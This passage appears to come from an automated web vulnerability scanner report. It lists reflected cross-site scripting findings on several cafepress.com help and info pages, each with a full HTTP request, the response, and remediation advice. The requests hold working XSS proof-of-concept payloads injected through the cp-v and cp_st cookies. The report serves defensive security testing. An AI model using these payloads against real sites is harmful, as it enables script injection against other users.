ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 46295 Date: Sun, 26 Dec 2010 13:46:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 46295 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... .com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/info/about/index.aspx' window.cafepress.tealeaf.searchTerm = '55d2b</script><script>alert(1)</script>e9999fa4cb2 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe61"-alert(1)-"a4da02b5a1a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58704 Date: Sun, 26 Dec 2010 13:46:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58704 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1161</script><script>alert(1)</script>2e613423535 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1161</script><script>alert(1)</script>2e613423535 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 58725 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58725 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HelpPage' window.cafepress.tealeaf.searchTerm = 'f1161</script><script>alert(1)</script>2e613423535 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/tos.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d434d"-alert(1)-"e31525dd84b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/tos.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 60935 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60935 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/help/tos.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc886</script><script>alert(1)</script>e31d106e7a6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/tos.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dc886</script><script>alert(1)</script>e31d106e7a6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 62950 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 62950 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HelpPage' window.cafepress.tealeaf.searchTerm = 'dc886</script><script>alert(1)</script>e31d106e7a6 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/sell/index.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 993ac"-alert(1)-"2f0f584fdd2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/sell/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 51652 Date: Sun, 26 Dec 2010 13:46:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/sell/index.aspx
Issue detail
